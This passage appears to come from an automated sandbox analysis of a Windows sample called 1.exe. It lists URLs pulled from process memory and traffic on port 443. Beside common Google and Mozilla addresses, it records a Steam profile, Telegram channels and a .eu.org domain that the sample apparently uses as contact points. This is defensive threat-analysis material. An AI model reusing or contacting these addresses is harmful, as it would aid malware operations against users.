Source: chrome.exe, 00000002.00000003.1835812513.000060E801A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1802415914.000060E800A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1894993319.000060E800E6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1893637460.000060E800DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1893695676.000060E800DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1894798929.000060E800E28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000002.00000002.1887760061.000060E8004A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000002.00000002.1890498248.000060E800998000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1890601480.000060E8009C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000002.00000003.1806881310.000060E801100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806696090.000060E80041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806881310.000060E801158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chromecache_80.4.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_77.4.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_77.4.dr	String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000002.00000002.1890498248.000060E800998000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1890601480.000060E8009C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000002.00000002.1883280993.000060E80006C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000002.00000002.1884913498.000060E800090000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000002.00000002.1892422967.000060E800C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889548993.000060E8007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887760061.000060E8004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889499150.000060E8007A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000002.00000002.1892422967.000060E800C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889548993.000060E8007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887760061.000060E8004A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889499150.000060E8007A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000002.00000003.1813919525.000060E800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000002.00000002.1887459577.000060E80040C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: 1.exe, 00000000.00000002.1675155262.0000000011A76000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199828130190
Source: 1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199828130190ot0yikamMozilla/5.0
Source: 1.exe, 00000001.00000002.2306596740.0000000003EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 1.exe, 00000001.00000002.2306596740.0000000003EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 1.exe, 00000001.00000003.1865465939.0000000003496000.00000004.00000020.00020000.00000000.sdmp, vk6xlx.1.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 1.exe, 00000001.00000002.2302254778.0000000003492000.00000004.00000020.00020000.00000000.sdmp, vk6xlx.1.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 1.exe, 00000001.00000003.1865465939.0000000003496000.00000004.00000020.00020000.00000000.sdmp, vk6xlx.1.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 1.exe, 00000001.00000002.2302254778.0000000003492000.00000004.00000020.00020000.00000000.sdmp, vk6xlx.1.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 1.exe, 00000001.00000002.2300803930.0000000000C66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: 1.exe, 00000001.00000002.2300803930.0000000000C66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/Q
Source: 1.exe, 00000001.00000003.1685608281.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300403212.00000000009DE000.00000040.00000400.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300803930.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300803930.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1685584321.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g02f04
Source: 1.exe, 00000001.00000003.1685608281.0000000000C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g02f04j9X
Source: 1.exe, 00000000.00000002.1675155262.00000000119DA000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300403212.00000000009DE000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/g02f04ot0yikamMozilla/5.0
Source: chrome.exe, 00000002.00000002.1890968661.000060E800A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: 1.exe, 00000001.00000003.1685608281.0000000000C95000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300803930.0000000000C83000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1685584321.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1700769058.0000000000C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: chromecache_77.4.dr	String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: 1.exe, 00000001.00000003.1685584321.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1727662440.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org
Source: 1.exe, 00000001.00000003.1755254477.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/
Source: 1.exe, 00000001.00000003.1727662440.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org//
Source: 1.exe, 00000001.00000003.1714198632.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1727662440.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/0
Source: 1.exe, 00000001.00000002.2300803930.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1714198632.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1700769058.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1741481344.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1727662440.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1755254477.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/8
Source: 1.exe, 00000001.00000002.2300803930.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1714198632.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1700769058.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1741481344.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1727662440.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1755254477.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/H
Source: 1.exe, 00000001.00000003.1714198632.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000003.1700769058.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/h
Source: 1.exe, 00000001.00000003.1714198632.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/q--
Source: 1.exe, 00000001.00000003.1714198632.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/x
Source: 1.exe, 00000001.00000003.1727662440.0000000000CA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.org/z
Source: 1.exe, 00000001.00000002.2305906778.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.0e0.jp.eu.orgK
Source: 1.exe, 00000001.00000002.2305906778.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300803930.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, uai5x4.1.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: 1.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: 1.exe, 00000001.00000002.2302254778.0000000003576000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000002.00000003.1834567304.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806668384.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1825181851.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1802599919.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892049335.000060E800BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000002.00000003.1834567304.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806668384.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1825181851.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1802599919.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892049335.000060E800BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000002.00000003.1834567304.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1806668384.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1825181851.000060E800BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1802599919.000060E800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892049335.000060E800BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: 1.exe, 00000001.00000002.2305906778.0000000003BD1000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000001.00000002.2300803930.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, uai5x4.1.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: chrome.exe, 00000002.00000003.1813919525.000060E800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000002.00000002.1895970996.000060E801094000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000002.00000003.1813919525.000060E800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000002.00000002.1888241692.000060E8005E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891108568.000060E800A48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000002.00000002.1889703732.000060E80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891987101.000060E800B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000002.00000002.1890968661.000060E800A30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000002.00000002.1896156103.000060E8010E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000002.00000002.1893379802.000060E800D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1890407137.000060E80096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889876909.000060E800860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000002.00000002.1893379802.000060E800D54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1886148516.000060E8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1890407137.000060E80096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889876909.000060E800860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: 1.exe, 00000001.00000002.2302254778.0000000003576000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1888126606.000060E8005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1891911358.000060E800B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887904227.000060E8004E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1889029768.000060E800710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000002.00000002.1889029768.000060E800710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000002.00000002.1887459577.000060E80040C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000002.00000002.1887459577.000060E80040C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000002.00000003.1806881310.000060E801158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000002.00000002.1887760061.000060E8004A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000002.00000002.1891108568.000060E800A48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000002.00000003.1813919525.000060E800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000002.00000002.1882852452.000060E80001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chromecache_77.4.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_77.4.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chrome.exe, 00000002.00000003.1831135918.000060E8016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1831185757.000060E8016A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1831358005.000060E8016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1831259839.000060E8016B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000002.00000003.1825495652.000060E801410000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000002.00000002.1886345380.000060E800280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000002.00000002.1895970996.000060E801094000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000002.00000002.1895970996.000060E801094000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000002.00000002.1888912360.000060E8006DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1887760061.000060E8004A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chromecache_80.4.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_80.4.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_80.4.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: chrome.exe, 00000002.00000002.1896694914.000060E801324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000002.00000003.1823655394.000060E8013A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1823493276.000060E8012D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819086324.000060E8012D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1823613584.000060E8012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819373657.000060E801368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1896694914.000060E801324000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000002.00000002.1890498248.000060E800998000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819451048.000060E801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819178022.000060E801378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1892771108.000060E800CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1896591707.000060E801318000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819303349.000060E801388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.MBb5Bwk2tpw.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000002.00000003.1823613584.000060E8012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819245674.000060E801380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819451048.000060E801354000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819178022.000060E801378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1896591707.000060E801318000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1819303349.000060E801388000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.S4XVq7ljTQU.L.W.O/m=qmd
Source: 1.exe, 00000001.00000002.2306596740.0000000003EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 1.exe, 00000001.00000002.2306596740.0000000003EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 1.exe, 00000001.00000002.2306596740.0000000003EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 1.exe, 00000001.00000002.2306596740.0000000003EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 1.exe, 00000001.00000002.2306596740.0000000003EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000002.00000002.1886675875.000060E8002C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.1888641429.000060E800688000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 58952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58978
Source: unknown	Network traffic detected: HTTP traffic on port 58946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 58959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 58955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 58951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58947
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58941
Source: unknown	Network traffic detected: HTTP traffic on port 58961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58950
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
